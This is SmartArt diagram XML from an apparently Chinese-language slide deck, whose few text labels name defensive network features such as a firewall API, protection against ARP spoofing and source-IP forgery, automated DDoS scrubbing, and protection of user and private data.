    <dgm:cxn modelId="{F30AC978-3039-495D-84BA-1A3096C6ECDD}" srcId="{553270DE-7325-48B8-86F7-DCAC61C900F4}" destId="{00993C51-1B33-4C4E-8134-D80145218AD4}" srcOrd="0" destOrd="0" parTransId="{5517EC94-86E7-49FE-A807-D283C283E46B}" sibTransId="{02581549-58DC-4E66-8CAC-C5D658BA604A}"/>
    <dgm:cxn modelId="{D6F4E03E-287B-42F0-A385-4C3ED0640F97}" type="presOf" srcId="{553270DE-7325-48B8-86F7-DCAC61C900F4}" destId="{BC07617A-849A-4E53-BAFF-0A823D4B1D30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{AE73C49F-098D-41E4-9C2C-73DFDDBE4485}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{E56D4CDF-18CA-4B6B-A0FB-3799A5C28248}" srcOrd="0" destOrd="0" parTransId="{37AC9DDD-2997-46C7-A2AE-5010830E3D18}" sibTransId="{3F639014-D8F5-4C2D-AE90-EB9CA0BCC511}"/>
    <dgm:cxn modelId="{2B243C4D-F589-4965-AB72-D0C632E19BF1}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{3168598A-CE75-4D5A-A0CD-5A2C63BFE78E}" srcOrd="3" destOrd="0" parTransId="{A98DBA19-C202-4DAD-A22A-06DAD5EB7163}" sibTransId="{4F507547-DC1A-4B81-8E08-4C17EC3C8C4E}"/>
    <dgm:cxn modelId="{1A4D56E5-39C5-4919-B917-C91964B0DE20}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{C668E882-8A25-4270-8642-643BE61F23C3}" srcOrd="6" destOrd="0" parTransId="{6F6E71A3-513A-4C40-8F0B-95387B0971D3}" sibTransId="{B353FDD0-7F9A-42A5-BCE5-8D4E9402D785}"/>
    <dgm:cxn modelId="{D28D0AB4-9E24-4073-AA78-B27BB3CAB24C}" type="presOf" srcId="{E56D4CDF-18CA-4B6B-A0FB-3799A5C28248}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{174B7E02-17C4-4B44-ABC6-E6C06E01C305}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{ABEFE3BF-3CF2-4656-808A-45B2194528E2}" srcOrd="5" destOrd="0" parTransId="{331057B4-5332-4050-9A14-695ECA60670E}" sibTransId="{4A19F22C-39D9-42EB-B4E2-007F11B8BB7F}"/>
    <dgm:cxn modelId="{1B0C2EDC-590E-4F61-8E00-CD2AAA0B31F2}" type="presOf" srcId="{7967A301-D288-48C1-BF02-17289093F02A}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{6CA997D6-7B13-4C84-9870-0574900E7054}" type="presParOf" srcId="{BC07617A-849A-4E53-BAFF-0A823D4B1D30}" destId="{5F5C0034-5CDE-4624-A164-36A3C7A05C7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{F8E0A6BC-6184-4019-9F20-CCA8A9AA1343}" type="presParOf" srcId="{5F5C0034-5CDE-4624-A164-36A3C7A05C7D}" destId="{0E2C60EE-B2DF-48E7-B6EC-3C0545E71FA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{62E77270-6A6C-41B1-A065-C8FD644A5C87}" type="presParOf" srcId="{5F5C0034-5CDE-4624-A164-36A3C7A05C7D}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC41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28327A-D7D7-4216-9707-FC10B94722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05F2FC89-6BD7-4398-9141-A463C7FD27FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>防火墙</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>API</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B291EF0F-5B03-4188-8469-5BDA4689F6F1}" type="parTrans" cxnId="{0A25723A-3C85-49A8-8D10-BF8F022C49D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801DD8D-32A2-4C2B-A60A-3B3A1C31D368}" type="sibTrans" cxnId="{0A25723A-3C85-49A8-8D10-BF8F022C49D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2081528-7CBF-4031-8A2F-9CFB337B9C01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>防止</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>ARP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>欺骗、</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>srcip</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>伪造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46E8A756-BF0A-4683-8AAB-77716C4A673E}" type="parTrans" cxnId="{09FBD38E-FE96-41C6-9A0D-78AD4762713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5289541-C5AA-431B-83EC-32E9E4B1F612}" type="sibTrans" cxnId="{09FBD38E-FE96-41C6-9A0D-78AD4762713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4F79613-CEA3-4871-B9D0-02538F1B14E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>自动化清洗</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>DDOS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BB862A8-1575-466A-9F91-2AE07FEE7CD5}" type="parTrans" cxnId="{DB397F53-3D36-4413-93F2-CCCAF1CAED0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8FD3359-FDAF-4C17-8800-F092B462E0FF}" type="sibTrans" cxnId="{DB397F53-3D36-4413-93F2-CCCAF1CAED0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5907693-5904-4513-B838-58406FDDBF6A}" type="pres">
      <dgm:prSet presAssocID="{8F28327A-D7D7-4216-9707-FC10B94722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FA91CC0-B4A6-47F8-9B1E-EA3DA2F6389B}" type="pres">
      <dgm:prSet presAssocID="{05F2FC89-6BD7-4398-9141-A463C7FD27F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E6257C-C878-4062-9011-AADAEBCD193C}" type="pres">
      <dgm:prSet presAssocID="{4801DD8D-32A2-4C2B-A60A-3B3A1C31D368}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{682CB181-60ED-4717-89B7-53B1FD6B36F7}" type="pres">
      <dgm:prSet presAssocID="{B2081528-7CBF-4031-8A2F-9CFB337B9C0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409E9E-E94E-439B-8447-0DF2954F27E9}" type="pres">
      <dgm:prSet presAssocID="{15289541-C5AA-431B-83EC-32E9E4B1F612}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1F09175-F9EA-4D95-97A0-C2B4D99C53F3}" type="pres">
      <dgm:prSet presAssocID="{C4F79613-CEA3-4871-B9D0-02538F1B14E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7E8A662-CB34-44D1-936F-E3416CDBBF02}" type="presOf" srcId="{C4F79613-CEA3-4871-B9D0-02538F1B14E3}" destId="{B1F09175-F9EA-4D95-97A0-C2B4D99C53F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{09FBD38E-FE96-41C6-9A0D-78AD4762713C}" srcId="{8F28327A-D7D7-4216-9707-FC10B947228B}" destId="{B2081528-7CBF-4031-8A2F-9CFB337B9C01}" srcOrd="1" destOrd="0" parTransId="{46E8A756-BF0A-4683-8AAB-77716C4A673E}" sibTransId="{15289541-C5AA-431B-83EC-32E9E4B1F612}"/>
    <dgm:cxn modelId="{FE2C1520-975D-481B-AD7B-470CD604F3F5}" type="presOf" srcId="{05F2FC89-6BD7-4398-9141-A463C7FD27FE}" destId="{AFA91CC0-B4A6-47F8-9B1E-EA3DA2F6389B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DB397F53-3D36-4413-93F2-CCCAF1CAED0E}" srcId="{8F28327A-D7D7-4216-9707-FC10B947228B}" destId="{C4F79613-CEA3-4871-B9D0-02538F1B14E3}" srcOrd="2" destOrd="0" parTransId="{4BB862A8-1575-466A-9F91-2AE07FEE7CD5}" sibTransId="{48FD3359-FDAF-4C17-8800-F092B462E0FF}"/>
    <dgm:cxn modelId="{0A25723A-3C85-49A8-8D10-BF8F022C49D3}" srcId="{8F28327A-D7D7-4216-9707-FC10B947228B}" destId="{05F2FC89-6BD7-4398-9141-A463C7FD27FE}" srcOrd="0" destOrd="0" parTransId="{B291EF0F-5B03-4188-8469-5BDA4689F6F1}" sibTransId="{4801DD8D-32A2-4C2B-A60A-3B3A1C31D368}"/>
    <dgm:cxn modelId="{8270F887-2CAB-4C2C-850E-9899AB0ED6A8}" type="presOf" srcId="{B2081528-7CBF-4031-8A2F-9CFB337B9C01}" destId="{682CB181-60ED-4717-89B7-53B1FD6B36F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D401602E-39CD-4EE6-976E-47924748BA4D}" type="presOf" srcId="{8F28327A-D7D7-4216-9707-FC10B947228B}" destId="{A5907693-5904-4513-B838-58406FDDBF6A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E75B0DE7-E683-4B35-818A-0033812C7AAE}" type="presParOf" srcId="{A5907693-5904-4513-B838-58406FDDBF6A}" destId="{AFA91CC0-B4A6-47F8-9B1E-EA3DA2F6389B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{454DAE18-2DDA-4E5A-B48C-4B0817234ACC}" type="presParOf" srcId="{A5907693-5904-4513-B838-58406FDDBF6A}" destId="{F6E6257C-C878-4062-9011-AADAEBCD193C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{50C4A0AE-C4C7-486B-847D-44BD59F5CCA0}" type="presParOf" srcId="{A5907693-5904-4513-B838-58406FDDBF6A}" destId="{682CB181-60ED-4717-89B7-53B1FD6B36F7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{25F83372-0E91-46BD-9F68-228D43CB68E0}" type="presParOf" srcId="{A5907693-5904-4513-B838-58406FDDBF6A}" destId="{71409E9E-E94E-439B-8447-0DF2954F27E9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FE401736-69C3-42EF-ADBF-4D61A1FCB634}" type="presParOf" srcId="{A5907693-5904-4513-B838-58406FDDBF6A}" destId="{B1F09175-F9EA-4D95-97A0-C2B4D99C53F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D77AD2-FFB4-4322-AD89-6225BC47D1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A46127E-BCAD-49AB-B1BA-816F42A90B3E}">
      <dgm:prSet/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保护用户数据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B2714F66-8B37-4E13-A98F-10E667A125A8}" type="parTrans" cxnId="{C2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6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E5263A7-AE8C-4536-8C57-1DBE3A6CA93E}" type="sibTrans" cxnId="{C2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6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7063223-D022-4CEB-95F0-0D3836605209}">
      <dgm:prSet/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隐私数据</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73DE5EAD-C0C2-4929-B0D7-53184ED04BCA}" type="parTrans" cxnId="{AAD4DB3C-C267-434D-8E01-FB83D89EC58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6DEB0EF-85DD-40C9-88D1-BC52D2894E5A}" type="sibTrans" cxnId="{AAD4DB3C-C267-434D-8E01-FB83D89EC58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AE27DEF-8F72-480D-ADEE-4048B25716F8}" type="pres">
      <dgm:prSet presAssocID="{BDD77AD2-FFB4-4322-AD89-6225BC47D1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8A160A-DA2E-453A-8B79-ECC493B50092}" type="pres">
      <dgm:prSet presAssocID="{4A46127E-BCAD-49AB-B1BA-816F42A90B3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B67BF4-0CC5-4116-99FE-F0E64F5709D4}" type="pres">
      <dgm:prSet presAssocID="{CE5263A7-AE8C-4536-8C57-1DBE3A6CA93E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" type="pres">
      <dgm:prSet presAssocID="{A7063223-D022-4CEB-95F0-0D383660520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2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6}" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{4A46127E-BCAD-49AB-B1BA-816F42A90B3E}" srcOrd="0" destOrd="0" parTransId="{B2714F66-8B37-4E13-A98F-10E667A125A8}" sibTransId="{CE5263A7-AE8C-4536-8C57-1DBE3A6CA93E}"/>
    <dgm:cxn modelId="{9B353CE1-6FEE-4FC3-A88D-77296822342A}" type="presOf" srcId="{A7063223-D022-4CEB-95F0-0D3836605209}" destId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6A6B032A-1BB2-4AD5-8C30-EB496E31F9F1}" type="presOf" srcId="{4A46127E-BCAD-49AB-B1BA-816F42A90B3E}" destId="{728A160A-DA2E-453A-8B79-ECC493B50092}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AAD4DB3C-C267-434D-8E01-FB83D89EC588}" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{A7063223-D022-4CEB-95F0-0D3836605209}" srcOrd="1" destOrd="0" parTransId="{73DE5EAD-C0C2-4929-B0D7-53184ED04BCA}" sibTransId="{66DEB0EF-85DD-40C9-88D1-BC52D2894E5A}"/>
    <dgm:cxn modelId="{F3A3AEFD-4E46-46BF-A868-5EB449D11649}" type="presOf" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BFBFBF6E-C6EF-4E82-B8CC-F32AF5E4A0EE}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{728A160A-DA2E-453A-8B79-ECC493B50092}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{22152F7D-A569-4508-B14A-7471679DD762}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{47B67BF4-0CC5-4116-99FE-F0E64F5709D4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3A175C1F-9F52-49F9-ADD9-D764B5F0EF7E}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList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D767A56-2D11-4507-B612-E834544DB5D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A5A49A3-7C94-46E8-A905-9B266D1B9F41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D9D45F3-C905-49B5-A253-B531C0F7618C}" type="parTrans" cxnId="{B941303A-E590-4D30-A41B-34219A565D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}" type="sibTrans" cxnId="{B941303A-E590-4D30-A41B-34219A565D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1763DE0E-C84C-40FB-BAA0-B0938037EDF4}" type="parTrans" cxnId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8AB56AC-6400-4C9C-B242-A144B62AC18C}" type="sibTrans" cxnId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p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Hadoop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为</a:t>
          </a:r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linux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设计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39DD6FC9-CAF1-4A10-BA9F-328EFF986CBE}" type="parTrans" cxnId="{332EE02C-2D53-4896-93DC-E1E2C93C2C8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7C0D2D4-5DD1-4A73-8DE0-9EA44C0CF7E2}" type="sibTrans" cxnId="{332EE02C-2D53-4896-93DC-E1E2C93C2C8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}">
      <dgm:prSet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共享“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gateway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”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561293F6-DAE4-4D4C-A781-3655F32AA122}" type="parTrans" cxnId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7677B5C4-1B23-476D-B13F-4767E75EBB77}" type="sibTrans" cxnId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" type="pres">
      <dgm:prSet presAssocID="{8D767A56-2D11-4507-B612-E834544DB5D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A96E356-7F19-439B-BD28-6F3E545A7A3D}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41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92CA2B-597B-4082-A55D-99EF477226A3}" type="pres">
      <dgm:prSet presAssocID="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41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7F6D4C-74A7-465E-82F9-E275BB2398FC}" type="pres">
      <dgm:prSet presAssocID="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8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65B576-E055-4DD2-8233-CD3B44B4DA0C}" type="pres">
      <dgm:prSet presAssocID="{6D143D28-DA4C-433A-9006-98534AC0B4B8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54D9DDA-59A2-418F-869E-763F2341B9A7}" type="presOf" srcId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" destId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{332EE02C-2D53-4896-93DC-E1E2C93C2C8D}" srcId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" destId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}" srcOrd="0" destOrd="0" parTransId="{39DD6FC9-CAF1-4A10-BA9F-328EFF986CBE}" sibTransId="{A7C0D2D4-5DD1-4A73-8DE0-9EA44C0CF7E2}"/>
    <dgm:cxn modelId="{8829DBF8-73D3-471A-9297-4F890232CB4A}" type="presOf" srcId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}" destId="{D965B576-E055-4DD2-8233-CD3B44B4DA0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3C4F31C3-3E0E-47AB-9A50-37C3EDE71932}" srcId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" destId="{B4F551AF-C8E9-4A1A-AAB5-1DE4407D0C4C}" srcOrd="0" destOrd="0" parTransId="{561293F6-DAE4-4D4C-A781-3655F32AA122}" sibTransId="{7677B5C4-1B23-476D-B13F-4767E75EBB77}"/>
    <dgm:cxn modelId="{25BB401D-72E9-4714-88EC-973C6FBF7368}" type="presOf" srcId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" destId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B941303A-E590-4D30-A41B-34219A565D9A}" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{2A5A49A3-7C94-46E8-A905-9B266D1B9F41}" srcOrd="0" destOrd="0" parTransId="{3D9D45F3-C905-49B5-A253-B531C0F7618C}" sibTransId="{ABC3B43F-A2B5-4785-A613-0AF896B56A75}"/>
    <dgm:cxn modelId="{9C91A6CE-D319-472E-BBF4-6F5FA14194D0}" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{6D143D28-DA4C-433A-9006-98534AC0B4B8}" srcOrd="1" destOrd="0" parTransId="{1763DE0E-C84C-40FB-BAA0-B0938037EDF4}" sibTransId="{E8AB56AC-6400-4C9C-B242-A144B62AC18C}"/>
    <dgm:cxn modelId="{59C30449-35F9-4166-BBB8-BE9EEBA98E98}" type="presOf" srcId="{A1D397F6-4914-4C5D-94B6-45A76DA3F4DC}" destId="{B792CA2B-597B-4082-A55D-99EF477226A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D673E14C-7ED3-4120-B98D-A0F42B58C2B1}" type="presOf" srcId="{8D767A56-2D11-4507-B612-E834544DB5D9}" destId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{33539746-1B2C-4AC8-9556-99DA9A4531E8}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9905AE0D-BF46-4B86-A118-85D3AF8E57F4}" type="presParOf" srcId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" destId="{D925029C-BB8D-468E-97FC-55DDC2A34389}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DC4B521B-CBCC-4C38-AF41-AA7D6B4947A8}" type="presParOf" srcId="{FA96E356-7F19-439B-BD28-6F3E545A7A3D}" destId="{B792CA2B-597B-4082-A55D-99EF477226A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F426BC62-173E-4048-998C-232D87B3CFA8}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{757F6D4C-74A7-465E-82F9-E275BB2398FC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{E16D0CD7-5FE3-4D48-BC78-C5BDCBFD6E62}" type="presParOf" srcId="{A9492E0B-5103-405C-A24F-55B65CFA405F}" destId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3044C123-1ACE-468C-807E-D908FCFBEC3F}" type="presParOf" srcId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" destId="{10B5771C-8BDE-4106-B6B2-DBA93218D7D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{0B23A64C-1719-47D2-952B-5112C0D03078}" type="presParOf" srcId="{37D6FCB2-8D5C-4E70-99C2-5F6BE842483E}" destId="{D965B576-E055-4DD2-8233-CD3B44B4DA0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A823028-2982-4928-A428-5430B6C23FB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83B6101-FB98-465B-BD71-8C5F468C4AB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
